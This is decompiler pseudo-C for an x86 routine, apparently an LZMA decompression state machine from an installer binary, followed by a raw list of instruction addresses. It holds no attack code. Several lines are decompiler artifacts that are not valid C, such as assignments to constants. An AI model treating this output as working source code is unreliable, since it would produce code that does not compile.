												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406b79
0x00406b79
0x00406b7d
0x00406b9e
0x00406ba5
0x00406bab
0x00406bb1
0x00406bc3
0x00406bc9
0x00406bce
0x00000000
0x00406b7f
0x00406b85
0x00406f46
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
